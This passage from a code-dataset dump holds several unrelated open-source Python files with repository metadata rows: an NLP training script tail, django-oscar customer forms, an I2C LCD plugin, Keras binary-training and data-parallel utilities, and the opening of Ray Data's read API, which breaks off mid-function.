# ONTONOTES5_CHINESE_DEV,
# ONTONOTES5_CHINESE_TEST,
# SortingSamplerBuilder(batch_size=64, batch_max_tokens=6400),
# lr=1e-3,
# doc_level_offset=True,
# ),
# 'srl': SpanRankingSemanticRoleLabeling(
# ONTONOTES5_CHINESE_TRAIN,
# ONTONOTES5_CHINESE_DEV,
# ONTONOTES5_CHINESE_TEST,
# SortingSamplerBuilder(batch_size=64, batch_max_tokens=6400),
# lr=1e-3,
# doc_level_offset=True,
# ),
'dep': BiaffineDependencyParsing(
ONTONOTES5_DEP_CHINESE_TRAIN,
ONTONOTES5_DEP_CHINESE_DEV,
ONTONOTES5_DEP_CHINESE_TEST,
SortingSamplerBuilder(batch_size=64, batch_max_tokens=6400),
lr=1e-3,
),
# 'con': CRFConstituencyParsing(
# ONTONOTES5_CON_CHINESE_TRAIN,
# ONTONOTES5_CON_CHINESE_DEV,
# ONTONOTES5_CON_CHINESE_TEST,
# SortingSamplerBuilder(batch_size=64, batch_max_tokens=6400),
# lr=1e-3,
# ),
}
mtl = MultiTaskLearning()
save_dir = f'data/model/mtl/ontonotes_albert_base_dep_zh_{i}'
cprint(f'Model will be saved in [cyan]{save_dir}[/cyan]')
mtl.fit(
ContextualWordEmbedding(
'token',
'voidful/albert_chinese_base',
average_subwords=True,
max_sequence_length=512,
word_dropout=.2,
),
tasks,
save_dir,
30,
lr=1e-3,
encoder_lr=5e-5,
grad_norm=1,
gradient_accumulation=1,
eval_trn=False,
transform=NormalizeToken(PTB_TOKEN_MAPPING, 'token'),
# prefetch=10,
# cache='data/tmp'
)
cprint(f'Model saved in [cyan]{save_dir}[/cyan]')
mtl.load(save_dir)
if 'dep' in mtl.tasks:
mtl['dep'].config.tree = True
mtl['dep'].config.proj = True
mtl.save_config(save_dir)
for k, v in mtl.tasks.items():
v.trn = tasks[k].trn
v.dev = tasks[k].dev
v.tst = tasks[k].tst
metric = mtl.evaluate(save_dir)[0]
scores.append(metric)
print(f'{"-".join(tasks.keys())} {len(scores)} runs scores:')
for each in scores:
cprint(each.cstr())
if __name__ == '__main__':
import torch
# torch.multiprocessing.set_start_method('spawn') # See https://github.com/pytorch/pytorch/issues/40403
main()
| 39.473684 | 121 | 0.625111 |
e3e7ec28a016ee91d719a0519faa7732691b69a1 | 15,723 | py | Python | src/oscar/apps/customer/forms.py | coderedcorp/django-oscar | 42856777fe34d88825280fd46b934ef9bb684fc5 | [
"BSD-3-Clause"
] | null | null | null | src/oscar/apps/customer/forms.py | coderedcorp/django-oscar | 42856777fe34d88825280fd46b934ef9bb684fc5 | [
"BSD-3-Clause"
] | 2 | 2019-03-13T16:15:54.000Z | 2019-07-04T18:53:37.000Z | src/oscar/apps/customer/forms.py | coderedcorp/django-oscar | 42856777fe34d88825280fd46b934ef9bb684fc5 | [
"BSD-3-Clause"
] | null | null | null | import string
from django import forms
from django.conf import settings
from django.contrib.auth import forms as auth_forms
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.password_validation import validate_password
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ValidationError
from django.utils.crypto import get_random_string
from django.utils.http import is_safe_url
from django.utils.translation import gettext_lazy as _
from django.utils.translation import pgettext_lazy
from oscar.apps.customer.utils import get_password_reset_url, normalise_email
from oscar.core.compat import (
existing_user_fields, get_user_model)
from oscar.core.decorators import deprecated
from oscar.core.loading import get_class, get_model, get_profile_class
from oscar.forms import widgets
Dispatcher = get_class('customer.utils', 'Dispatcher')
CommunicationEventType = get_model('customer', 'communicationeventtype')
ProductAlert = get_model('customer', 'ProductAlert')
User = get_user_model()
def generate_username():
letters = string.ascii_letters
allowed_chars = letters + string.digits + '_'
uname = get_random_string(length=30, allowed_chars=allowed_chars)
try:
User.objects.get(username=uname)
return generate_username()
except User.DoesNotExist:
return uname
class PasswordResetForm(auth_forms.PasswordResetForm):
"""
This form takes the same structure as its parent from django.contrib.auth
"""
communication_type_code = "PASSWORD_RESET"
def save(self, domain_override=None, use_https=False, request=None,
**kwargs):
"""
Generates a one-use only link for resetting password and sends to the
user.
"""
site = get_current_site(request)
if domain_override is not None:
site.domain = site.name = domain_override
email = self.cleaned_data['email']
active_users = User._default_manager.filter(
email__iexact=email, is_active=True)
for user in active_users:
reset_url = self.get_reset_url(site, request, user, use_https)
ctx = {
'user': user,
'site': site,
'reset_url': reset_url}
messages = CommunicationEventType.objects.get_and_render(
code=self.communication_type_code, context=ctx)
Dispatcher().dispatch_user_messages(user, messages)
def get_reset_url(self, site, request, user, use_https):
# the request argument isn't used currently, but implementors might
# need it to determine the correct subdomain
reset_url = "%s://%s%s" % (
'https' if use_https else 'http',
site.domain,
get_password_reset_url(user))
return reset_url
@deprecated
class SetPasswordForm(auth_forms.SetPasswordForm):
"""
Deprecated - use django.contrib.auth.forms.SetPasswordForm instead.
"""
pass
@deprecated
class PasswordChangeForm(auth_forms.PasswordChangeForm):
"""
Deprecated - use django.contrib.auth.forms.PasswordChangeForm instead.
"""
pass
class EmailAuthenticationForm(AuthenticationForm):
"""
Extends the standard django AuthenticationForm, to support 75 character
usernames. 75 character usernames are needed to support the EmailOrUsername
auth backend.
"""
username = forms.EmailField(label=_('Email address'))
redirect_url = forms.CharField(
widget=forms.HiddenInput, required=False)
def __init__(self, host, *args, **kwargs):
self.host = host
super().__init__(*args, **kwargs)
def clean_redirect_url(self):
url = self.cleaned_data['redirect_url'].strip()
if url and is_safe_url(url, self.host):
return url
class ConfirmPasswordForm(forms.Form):
"""
Extends the standard django AuthenticationForm, to support 75 character
usernames. 75 character usernames are needed to support the EmailOrUsername
auth backend.
"""
password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
def __init__(self, user, *args, **kwargs):
super().__init__(*args, **kwargs)
self.user = user
def clean_password(self):
password = self.cleaned_data['password']
if not self.user.check_password(password):
raise forms.ValidationError(
_("The entered password is not valid!"))
return password
class EmailUserCreationForm(forms.ModelForm):
email = forms.EmailField(label=_('Email address'))
password1 = forms.CharField(
label=_('Password'), widget=forms.PasswordInput)
password2 = forms.CharField(
label=_('Confirm password'), widget=forms.PasswordInput)
redirect_url = forms.CharField(
widget=forms.HiddenInput, required=False)
class Meta:
model = User
fields = ('email',)
def __init__(self, host=None, *args, **kwargs):
self.host = host
super().__init__(*args, **kwargs)
def clean_email(self):
"""
Checks for existing users with the supplied email address.
"""
email = normalise_email(self.cleaned_data['email'])
if User._default_manager.filter(email__iexact=email).exists():
raise forms.ValidationError(
_("A user with that email address already exists"))
return email
def clean_password2(self):
password1 = self.cleaned_data.get('password1', '')
password2 = self.cleaned_data.get('password2', '')
if password1 != password2:
raise forms.ValidationError(
_("The two password fields didn't match."))
validate_password(password2, self.instance)
return password2
def clean_redirect_url(self):
url = self.cleaned_data['redirect_url'].strip()
if url and is_safe_url(url, self.host):
return url
return settings.LOGIN_REDIRECT_URL
def save(self, commit=True):
user = super().save(commit=False)
user.set_password(self.cleaned_data['password1'])
if 'username' in [f.name for f in User._meta.fields]:
user.username = generate_username()
if commit:
user.save()
return user
class OrderSearchForm(forms.Form):
date_from = forms.DateField(
required=False, label=pgettext_lazy("start date", "From"),
widget=widgets.DatePickerInput())
date_to = forms.DateField(
required=False, label=pgettext_lazy("end date", "To"),
widget=widgets.DatePickerInput())
order_number = forms.CharField(required=False, label=_("Order number"))
def clean(self):
if self.is_valid() and not any([self.cleaned_data['date_from'],
self.cleaned_data['date_to'],
self.cleaned_data['order_number']]):
raise forms.ValidationError(_("At least one field is required."))
return super().clean()
def description(self):
"""
Uses the form's data to build a useful description of what orders
are listed.
"""
if not self.is_bound or not self.is_valid():
return _('All orders')
else:
date_from = self.cleaned_data['date_from']
date_to = self.cleaned_data['date_to']
order_number = self.cleaned_data['order_number']
return self._orders_description(date_from, date_to, order_number)
def _orders_description(self, date_from, date_to, order_number):
if date_from and date_to:
if order_number:
desc = _('Orders placed between %(date_from)s and '
'%(date_to)s and order number containing '
'%(order_number)s')
else:
desc = _('Orders placed between %(date_from)s and '
'%(date_to)s')
elif date_from:
if order_number:
desc = _('Orders placed since %(date_from)s and '
'order number containing %(order_number)s')
else:
desc = _('Orders placed since %(date_from)s')
elif date_to:
if order_number:
desc = _('Orders placed until %(date_to)s and '
'order number containing %(order_number)s')
else:
desc = _('Orders placed until %(date_to)s')
elif order_number:
desc = _('Orders with order number containing %(order_number)s')
else:
return None
params = {
'date_from': date_from,
'date_to': date_to,
'order_number': order_number,
}
return desc % params
def get_filters(self):
date_from = self.cleaned_data['date_from']
date_to = self.cleaned_data['date_to']
order_number = self.cleaned_data['order_number']
kwargs = {}
if date_from and date_to:
kwargs['date_placed__range'] = [date_from, date_to]
elif date_from and not date_to:
kwargs['date_placed__gt'] = date_from
elif not date_from and date_to:
kwargs['date_placed__lt'] = date_to
if order_number:
kwargs['number__contains'] = order_number
return kwargs
class UserForm(forms.ModelForm):
def __init__(self, user, *args, **kwargs):
self.user = user
kwargs['instance'] = user
super().__init__(*args, **kwargs)
if 'email' in self.fields:
self.fields['email'].required = True
def clean_email(self):
"""
Make sure that the email address is aways unique as it is
used instead of the username. This is necessary because the
unique-ness of email addresses is *not* enforced on the model
level in ``django.contrib.auth.models.User``.
"""
email = normalise_email(self.cleaned_data['email'])
if User._default_manager.filter(
email__iexact=email).exclude(id=self.user.id).exists():
raise ValidationError(
_("A user with this email address already exists"))
# Save the email unaltered
return email
class Meta:
model = User
fields = existing_user_fields(['first_name', 'last_name', 'email'])
Profile = get_profile_class()
if Profile: # noqa (too complex (12))
class UserAndProfileForm(forms.ModelForm):
def __init__(self, user, *args, **kwargs):
try:
instance = Profile.objects.get(user=user)
except Profile.DoesNotExist:
# User has no profile, try a blank one
instance = Profile(user=user)
kwargs['instance'] = instance
super().__init__(*args, **kwargs)
# Get profile field names to help with ordering later
profile_field_names = list(self.fields.keys())
# Get user field names (we look for core user fields first)
core_field_names = set([f.name for f in User._meta.fields])
user_field_names = ['email']
for field_name in ('first_name', 'last_name'):
if field_name in core_field_names:
user_field_names.append(field_name)
user_field_names.extend(User._meta.additional_fields)
# Store user fields so we know what to save later
self.user_field_names = user_field_names
# Add additional user form fields
additional_fields = forms.fields_for_model(
User, fields=user_field_names)
self.fields.update(additional_fields)
# Ensure email is required and initialised correctly
self.fields['email'].required = True
# Set initial values
for field_name in user_field_names:
self.fields[field_name].initial = getattr(user, field_name)
# Ensure order of fields is email, user fields then profile fields
self.fields.keyOrder = user_field_names + profile_field_names
class Meta:
model = Profile
exclude = ('user',)
def clean_email(self):
email = normalise_email(self.cleaned_data['email'])
users_with_email = User._default_manager.filter(
email__iexact=email).exclude(id=self.instance.user.id)
if users_with_email.exists():
raise ValidationError(
_("A user with this email address already exists"))
return email
def save(self, *args, **kwargs):
user = self.instance.user
# Save user also
for field_name in self.user_field_names:
setattr(user, field_name, self.cleaned_data[field_name])
user.save()
return super().save(*args, **kwargs)
ProfileForm = UserAndProfileForm
else:
ProfileForm = UserForm
class ProductAlertForm(forms.ModelForm):
email = forms.EmailField(required=True, label=_('Send notification to'),
widget=forms.TextInput(attrs={
'placeholder': _('Enter your email')
}))
def __init__(self, user, product, *args, **kwargs):
self.user = user
self.product = product
super().__init__(*args, **kwargs)
# Only show email field to unauthenticated users
if user and user.is_authenticated:
self.fields['email'].widget = forms.HiddenInput()
self.fields['email'].required = False
def save(self, commit=True):
alert = super().save(commit=False)
if self.user.is_authenticated:
alert.user = self.user
alert.product = self.product
if commit:
alert.save()
return alert
def clean(self):
cleaned_data = self.cleaned_data
email = cleaned_data.get('email')
if email:
try:
ProductAlert.objects.get(
product=self.product, email__iexact=email,
status=ProductAlert.ACTIVE)
except ProductAlert.DoesNotExist:
pass
else:
raise forms.ValidationError(_(
"There is already an active stock alert for %s") % email)
# Check that the email address hasn't got other unconfirmed alerts.
# If they do then we don't want to spam them with more until they
# have confirmed or cancelled the existing alert.
if ProductAlert.objects.filter(email__iexact=email,
status=ProductAlert.UNCONFIRMED).count():
raise forms.ValidationError(_(
"%s has been sent a confirmation email for another product "
"alert on this site. Please confirm or cancel that request "
"before signing up for more alerts.") % email)
elif self.user.is_authenticated:
try:
ProductAlert.objects.get(product=self.product,
user=self.user,
status=ProductAlert.ACTIVE)
except ProductAlert.DoesNotExist:
pass
else:
raise forms.ValidationError(_(
"You already have an active alert for this product"))
return cleaned_data
class Meta:
model = ProductAlert
fields = ['email']
| 36.65035 | 84 | 0.614132 |
eb9d38220ad68777d0f10a5f1c841409c88c9d81 | 3,442 | py | Python | platypush/plugins/lcd/i2c.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | platypush/plugins/lcd/i2c.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | platypush/plugins/lcd/i2c.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | from typing import Optional
from platypush.plugins.lcd import LcdPlugin
class LcdI2cPlugin(LcdPlugin):
"""
Plugin to write to an LCD display connected via I2C.
Adafruit I2C/SPI LCD Backback is supported.
Warning: You might need a level shifter (that supports i2c)
between the SCL/SDA connections on the MCP chip / backpack and the Raspberry Pi.
Or you might damage the Pi and possibly any other 3.3V i2c devices
connected on the i2c bus. Or cause reliability issues. The SCL/SDA are rated 0.7*VDD
on the MCP23008, so it needs 3.5V on the SCL/SDA when 5V is applied to drive the LCD.
The MCP23008 and MCP23017 needs to be connected exactly the same way as the backpack.
For complete schematics see the adafruit page at:
https://learn.adafruit.com/i2c-spi-lcd-backpack/
4-bit operation. I2C only supported.
Pin mapping::
7 | 6 | 5 | 4 | 3 | 2 | 1 | 0
BL | D7 | D6 | D5 | D4 | E | RS | -
Requires:
* **RPLCD** (``pip install RPLCD``)
* **RPi.GPIO** (``pip install RPi.GPIO``)
"""
def __init__(self, i2c_expander: str, address: int,
expander_params: Optional[dict] = None,
port: int = 1, cols: int = 16, rows: int = 2,
backlight_enabled: bool = True,
dotsize: int = 8, charmap: str = 'A02',
auto_linebreaks: bool = True, **kwargs):
"""
:param i2c_expander: Set your I²C chip type. Supported: "PCF8574", "MCP23008", "MCP23017".
:param address: The I2C address of your LCD.
:param expander_params: Parameters for expanders, in a dictionary. Only needed for MCP23017
gpio_bank - This must be either ``A`` or ``B``. If you have a HAT, A is usually marked 1 and B is 2.
Example: ``expander_params={'gpio_bank': 'A'}``
:param port: The I2C port number. Default: ``1``.
:param cols: Number of columns per row (usually 16 or 20). Default: ``16``.
:param rows: Number of display rows (usually 1, 2 or 4). Default: ``2``.
:param backlight_enabled: Whether the backlight is enabled initially. Default: ``True``. Has no effect if pin_backlight is ``None``
:param dotsize: Some 1 line displays allow a font height of 10px. Allowed: ``8`` or ``10``. Default: ``8``.
:param charmap: The character map used. Depends on your LCD. This must be either ``A00`` or ``A02`` or ``ST0B``. Default: ``A02``.
:param auto_linebreaks: Whether or not to automatically insert line breaks. Default: ``True``.
"""
super().__init__(**kwargs)
self.i2c_expander = i2c_expander
self.address = address
self.expander_params = expander_params or {}
self.port = port
self.cols = cols
self.rows = rows
self.backlight_enabled = backlight_enabled
self.dotsize = dotsize
self.auto_linebreaks = auto_linebreaks
self.charmap = charmap
def _get_lcd(self):
from RPLCD.i2c import CharLCD
return CharLCD(cols=self.cols, rows=self.rows,
i2c_expander=self.i2c_expander,
address=self.address, port=self.port,
backlight_enabled=self.backlight_enabled,
dotsize=self.dotsize, charmap=self.charmap,
auto_linebreaks=self.auto_linebreaks)
# vim:sw=4:ts=4:et:
| 44.701299 | 140 | 0.620569 |
542587b7e30d26597562fb605d86bbaa45eb3584 | 5,265 | py | Python | trainer2.py | YuanshengZhao/adiabaticbinary | 2db98957e3d570a3d4fa94d25aed65810576b898 | [
"MIT"
] | null | null | null | trainer2.py | YuanshengZhao/adiabaticbinary | 2db98957e3d570a3d4fa94d25aed65810576b898 | [
"MIT"
] | null | null | null | trainer2.py | YuanshengZhao/adiabaticbinary | 2db98957e3d570a3d4fa94d25aed65810576b898 | [
"MIT"
] | null | null | null | import tensorflow as tf
import numpy as np
class Trainer(object):
def __init__(self, same_wts_ep, mode="b"):
self.binbest=0.0
self.same_wts_ep=same_wts_ep
self.sw_epc=0
self.tot_sw=0
self.mode=mode
self.pmode="a" if mode=="a" else "w"
self.prto=1.5
self.maxpush=3
self.lr_power=0.3
self.lr_base=1.0
self.val_bs=125
self.reduction=.8
self.break_r=3 #must > 2
self.bchange=-1 #change mode every time
def refresh(self):
self.binbest=0.0
self.sw_epc=0
self.tot_sw=0
def train(self, model, datagen, x_tr,y_tr, x_val, y_val, max_epochs, lnr, save_header, clear_optz, x_test, y_test):
same_push=0
for epoch_i in range(max_epochs):
if(self.mode=="w"):
model.optimizer.learning_rate.assign(lnr/(model.get_kk()/self.lr_base)**self.lr_power)
else:
model.optimizer.learning_rate.assign(lnr/(model.get_ka()/self.lr_base)**self.lr_power)
self.sw_epc += 1
self.tot_sw +=1
print("epoch",epoch_i+1, "sw",self.sw_epc, self.tot_sw, "mxep",max_epochs, "lr",model.optimizer.learning_rate.numpy(), "bb",self.binbest)
if(datagen is not None):
rst=model.fit(datagen.flow(x_tr,y_tr,batch_size=self.val_bs),
epochs=1, validation_data=(x_val,y_val), validation_batch_size=self.val_bs, verbose=2)
else:
rst=model.fit(x_tr,y_tr,batch_size=self.val_bs,
epochs=1, validation_data=(x_val,y_val), validation_batch_size=self.val_bs, verbose=2)
#save_weights
if (self.mode=="b"):
fmn=save_header+"_w%0.1f_a%0.1f.npz"%(model.get_kk().numpy(),model.get_ka().numpy())
elif (self.mode=="w"):
fmn=save_header+"_w%0.1f.npz"%(model.get_kk().numpy())
else:
fmn=save_header+"_a%0.1f.npz"%(model.get_ka().numpy())
wtsn=model.get_weights()
np.savez(fmn,*wtsn)
vala=rst.history['val_accuracy'][0]
#test on binary
if (self.mode=="b" or self.mode=="w"):
kk_now=tf.identity(model.get_kk().numpy())
model.set_kk(1e5)
if (self.mode=="b" or self.mode=="a"):
ka_now=tf.identity(model.get_ka().numpy())
model.set_ka(1e5)
vbin=model.evaluate(x_val,y_val, verbose=0, batch_size=self.val_bs)[1]
if(self.binbest < vbin):
self.binbest=vbin
self.sw_epc = self.tot_sw = 0
same_push=100 # nextpush will change
np.savez(save_header + self.mode + "_Best.npz",*wtsn)
if(x_test is not None):
print("\033[94mtest perf: ",end="")
model.evaluate(x_test, y_test, verbose=2, batch_size=self.val_bs)
print("\033[0m",end="")
if (self.mode=="b" or self.mode=="w"):
model.set_kk(kk_now)
if (self.mode=="b" or self.mode=="a"):
model.set_ka(ka_now)
if (self.mode=="b" or self.mode=="w"):
print("kk=",model.get_kk().numpy(),end=" ")
if (self.mode=="b" or self.mode=="a"):
print("ka=",model.get_ka().numpy(),end=" ")
print("val_acc=",vala,"bin_acc=",vbin)
if(self.tot_sw>=self.same_wts_ep*self.break_r):
break
#push kk and ka
if(self.sw_epc>=self.same_wts_ep):
if(self.mode=="b" and same_push>=self.bchange):
self.pmode="a" if self.pmode=="w" else "w"
same_push=0
else:
same_push+=1
if(self.pmode=="w"):
for _ in range(self.maxpush):
model.set_kk(model.get_kk() * self.prto)
vala1=model.evaluate(x_val,y_val,verbose=0,batch_size=self.val_bs)[1]
print("push kk to",model.get_kk().numpy(),"acc=",vala1)
if(vala1<vala or model.get_kk()>1e3):
break
else:
for _ in range(self.maxpush):
model.set_ka(model.get_ka() * self.prto)
vala1=model.evaluate(x_val,y_val,verbose=0,batch_size=self.val_bs)[1]
print("push ka to",model.get_ka().numpy(),"acc=",vala1)
if(vala1<vala or model.get_ka()>1e3):
break
self.sw_epc=int(self.sw_epc*self.reduction)
if(clear_optz):
for vari in model.optimizer.variables():
vari.assign(tf.zeros_like(vari))
if (self.mode=="b" or self.mode=="w"):
if (model.get_kk().numpy()>1e3):
break
if (self.mode=="b" or self.mode=="a"):
if (model.get_ka().numpy()>1e3):
break | 42.459677 | 150 | 0.496676 |
5bb40c044702dfe8fd4e4e33915bf996bfeef9eb | 7,404 | py | Python | data_parallel_model.py | winwinJJiang/keras_multi_gpu_training | d156237217c54ba618c73c300f22e332f6b23b0e | [
"MIT"
] | 76 | 2017-08-10T13:17:40.000Z | 2021-12-20T19:28:41.000Z | data_parallel_model.py | winwinJJiang/keras_multi_gpu_training | d156237217c54ba618c73c300f22e332f6b23b0e | [
"MIT"
] | 8 | 2017-08-10T13:04:20.000Z | 2019-06-09T10:17:15.000Z | data_parallel_model.py | winwinJJiang/keras_multi_gpu_training | d156237217c54ba618c73c300f22e332f6b23b0e | [
"MIT"
] | 20 | 2017-08-31T12:50:46.000Z | 2021-12-20T19:28:41.000Z | import keras.backend as K
from keras.layers import Lambda
from keras.layers.merge import concatenate
from keras.models import Model
import keras.optimizers
from keras.optimizers import clip_norm, Optimizer
import tensorflow as tf
# this should be fairly ready
class DataParallelOptimizer(Optimizer):
"""
Wrapper class for data-parallel optimization. Multiple model replicas
(towers) with shared weights operate on different batch slices and compute
gradients in parallel on multiple GPUs. Gradients are then averaged on
parameter sever (CPU or one of GPUs) and weights updated.
It accepts a list of losses (living on separate devices) instead of a
single loss, computes gradients (collocated with losses) for each loss,
averages then on the PS device and provides weight update operations.
Usage:
from keras.optimizers import Adam
model.compile(..., optimizer=DataParallelOptimizer(Adam()))
"""
def __init__(self, optimizer):
self.optimizer = keras.optimizers.get(optimizer)
def get_gradients(self, losses, params):
# NOTE: argument "losses" (list) instead of a single "loss"
if isinstance(losses, list):
# Gradients for each tower loss.
# NOTE: K.gradients call tf.gradiens with
# colocate_gradients_with_ops=True, thus each tf.gradient operation
# should be collocated with it's respective loss. We assume losses
# to be located at different devices.
tower_grads = [K.gradients(loss, params) for loss in losses]
# Average gradients.
# This should be a synchronization point (for sync SGD) and this
# operation will be located according to the scope where the main
# Model was defined - should be the parameter server device.
grads = K.mean(K.stack(tower_grads, 0))
else:
grads = K.gradients(losses, params)
if hasattr(self, 'clipnorm') and self.clipnorm > 0:
norm = K.sqrt(sum([K.sum(K.square(g)) for g in grads]))
grads = [clip_norm(g, self.clipnorm, norm) for g in grads]
if hasattr(self, 'clipvalue') and self.clipvalue > 0:
grads = [K.clip(g, -self.clipvalue, self.clipvalue) for g in grads]
return grads
def get_updates(self, params, constraints, loss):
return self.optimizer.get_updates(params, constraints, loss)
@property
def weights(self):
self.optimizer.weights()
def get_config(self):
self.optimizer.get_config()
def from_config(self, config):
self.optimizer.from_config()
# so far just an incomplete sketch...
class DataParallelModel(Model):
def __init__(self, inputs, outputs, basic_model, replicas, name=None):
super(DataParallelModel, self).__init__(inputs, outputs, name)
self.basic_model = basic_model
self.replicas = replicas
@classmethod
def create(cls, basic_model, gpu_count=2):
assert gpu_count >= 2, "At least 2 GPUs"
def get_slice(data, idx, parts):
shape = tf.shape(data)
size = tf.concat([shape[:1] // parts, shape[1:]], axis=0)
stride = tf.concat([shape[:1] // parts, shape[1:] * 0], axis=0)
start = stride * idx
return tf.slice(data, start, size)
outputs_all = []
replicas = []
# place operations for replica on a separate device
for gpu_id in range(gpu_count):
with tf.device("gpu:%d" % gpu_id):
with tf.name_scope('replica_%d' % gpu_id):
slices = []
# Slice each input into a piece for processing on this GPU
for x in basic_model.inputs:
input_shape = tuple(x.get_shape().as_list())[1:]
slice = Lambda(get_slice, output_shape=input_shape,
arguments={'idx': gpu_id, 'parts': gpu_count})(x)
slices.append(slice)
if gpu_id == 0:
for i in range(len(basic_model.outputs)):
outputs_all.append([])
outputs = basic_model(slices)
replica = Model(inputs=basic_model.inputs, outputs=outputs)
replicas.append(replica)
if not isinstance(outputs, list):
outputs = [outputs]
# Save all the outputs for merging back together later
for l in range(len(outputs)):
outputs_all[l].append(outputs[l])
with tf.device("gpu:0"):
merged = []
for outputs in outputs_all:
merged.append(concatenate(outputs, axis=0))
return cls(inputs=basic_model.inputs, outputs=merged,
basic_model=basic_model, replicas=replicas)
def compile(self, optimizer, loss, metrics=None, loss_weights=None,
sample_weight_mode=None, **kwargs):
"""
optimizer - identifier or instance of an optimizer
loss - identifier or instance of a loss function
"""
# Avoid storing optimizer variables in multiple replicas.
# Let's initialize it now on the PS device.
with tf.device("gpu:0"):
optimizer = keras.optimizers.get(optimizer)
replica_total_losses = []
# place the loss and gradient operations for replica on a separate device
for gpu_id, replica in enumerate(self.replicas):
with tf.device("gpu:%d" % gpu_id):
with tf.name_scope('replica_%d' % gpu_id):
replica.compile(optimizer, loss, metrics, loss_weights)
replica_total_losses.append(replica.total_loss)
super(DataParallelModel, self).compile(
DataParallelOptimizer(optimizer), loss, metrics, loss_weights)
# separate losses whose gradient can be computed in parallel
self.replica_total_losses = replica_total_losses
# redefine total_loss with the average of replica losses
self.total_loss = K.mean(K.stack(replica_total_losses, 0))
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise RuntimeError('You must compile your model before using it.')
if self.train_function is None:
inputs = self._feed_inputs + self._feed_targets + self._feed_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs += [K.learning_phase()]
assert isinstance(self.optimizer, DataParallelOptimizer)
training_updates = self.optimizer.get_updates(
self._collected_trainable_weights,
self.constraints,
self.replica_total_losses)
updates = self.updates + training_updates
# Gets loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
name='train_function',
**self._function_kwargs)
# TODO: in ModelCheckpointer save the basic_model
| 43.046512 | 87 | 0.60913 |
8d1b66d04c044786e775b3d6349f0b1405e748bb | 21,909 | py | Python | python/ray/data/read_api.py | odp/ray | ab55b808c56f9e23af575fa1b1c1948e44c7e36a | [
"Apache-2.0"
] | null | null | null | python/ray/data/read_api.py | odp/ray | ab55b808c56f9e23af575fa1b1c1948e44c7e36a | [
"Apache-2.0"
] | 24 | 2021-10-30T07:09:36.000Z | 2022-03-12T08:09:04.000Z | python/ray/data/read_api.py | sasha-s/ray | 635010d460ba266b56fc857e56af8272ae08df8c | [
"Apache-2.0"
] | null | null | null | import itertools
import logging
from typing import List, Any, Dict, Union, Optional, Tuple, Callable, \
TypeVar, TYPE_CHECKING
import numpy as np
if TYPE_CHECKING:
import pyarrow
import pandas
import dask
import mars
import modin
import pyspark
import ray
from ray.types import ObjectRef
from ray.util.annotations import PublicAPI, DeveloperAPI
from ray.data.block import Block, BlockAccessor, BlockMetadata
from ray.data.dataset import Dataset
from ray.data.datasource import Datasource, RangeDatasource, \
JSONDatasource, CSVDatasource, ParquetDatasource, BinaryDatasource, \
NumpyDatasource, ReadTask
from ray.data.impl.arrow_block import ArrowRow, \
DelegatingArrowBlockBuilder
from ray.data.impl.block_list import BlockList
from ray.data.impl.lazy_block_list import LazyBlockList
from ray.data.impl.remote_fn import cached_remote_fn
from ray.data.impl.util import _get_spread_resources_iter
T = TypeVar("T")
logger = logging.getLogger(__name__)
@PublicAPI(stability="beta")
def from_items(items: List[Any], *, parallelism: int = 200) -> Dataset[Any]:
"""Create a dataset from a list of local Python objects.
Examples:
>>> ray.data.from_items([1, 2, 3, 4, 5])
Args:
items: List of local Python objects.
parallelism: The amount of parallelism to use for the dataset.
Returns:
Dataset holding the items.
"""
block_size = max(1, len(items) // parallelism)
blocks: List[ObjectRef[Block]] = []
metadata: List[BlockMetadata] = []
i = 0
while i < len(items):
builder = DelegatingArrowBlockBuilder()
for item in items[i:i + block_size]:
builder.add(item)
block = builder.build()
blocks.append(ray.put(block))
metadata.append(
BlockAccessor.for_block(block).get_metadata(input_files=None))
i += block_size
return Dataset(BlockList(blocks, metadata))
@PublicAPI(stability="beta")
def range(n: int, *, parallelism: int = 200) -> Dataset[int]:
"""Create a dataset from a range of integers [0..n).
Examples:
>>> ray.data.range(10000).map(lambda x: x * 2).show()
Args:
n: The upper bound of the range of integers.
parallelism: The amount of parallelism to use for the dataset.
Returns:
Dataset holding the integers.
"""
return read_datasource(
RangeDatasource(), parallelism=parallelism, n=n, block_format="list")
@PublicAPI(stability="beta")
def range_arrow(n: int, *, parallelism: int = 200) -> Dataset[ArrowRow]:
"""Create an Arrow dataset from a range of integers [0..n).
Examples:
>>> ds = ray.data.range_arrow(1000)
>>> ds.map(lambda r: {"v2": r["value"] * 2}).show()
This is similar to range(), but uses Arrow tables to hold the integers
in Arrow records. The dataset elements take the form {"value": N}.
Args:
n: The upper bound of the range of integer records.
parallelism: The amount of parallelism to use for the dataset.
Returns:
Dataset holding the integers as Arrow records.
"""
return read_datasource(
RangeDatasource(), parallelism=parallelism, n=n, block_format="arrow")
@PublicAPI(stability="beta")
def range_tensor(n: int, *, shape: Tuple = (1, ),
parallelism: int = 200) -> Dataset[np.ndarray]:
"""Create a Tensor dataset from a range of integers [0..n).
Examples:
>>> ds = ray.data.range_tensor(1000, shape=(3, 10))
>>> ds.map_batches(lambda arr: arr ** 2).show()
This is similar to range(), but uses np.ndarrays to hold the integers
in tensor form. The dataset has overall the shape ``(n,) + shape``.
Args:
n: The upper bound of the range of integer records.
shape: The shape of each record.
parallelism: The amount of parallelism to use for the dataset.
Returns:
Dataset holding the integers as tensors.
"""
return read_datasource(
RangeDatasource(),
parallelism=parallelism,
n=n,
block_format="tensor",
tensor_shape=tuple(shape))
@PublicAPI(stability="beta")
def read_datasource(datasource: Datasource[T],
*,
parallelism: int = 200,
ray_remote_args: Dict[str, Any] = None,
_spread_resource_prefix: Optional[str] = None,
**read_args) -> Dataset[T]:
"""Read a dataset from a custom data source.
Args:
datasource: The datasource to read data from.
parallelism: The requested parallelism of the read.
read_args: Additional kwargs to pass to the datasource impl.
ray_remote_args: kwargs passed to ray.remote in the read tasks.
Returns:
Dataset holding the data read from the datasource.
"""
read_tasks = datasource.prepare_read(parallelism, **read_args)
def remote_read(task: ReadTask) -> Block:
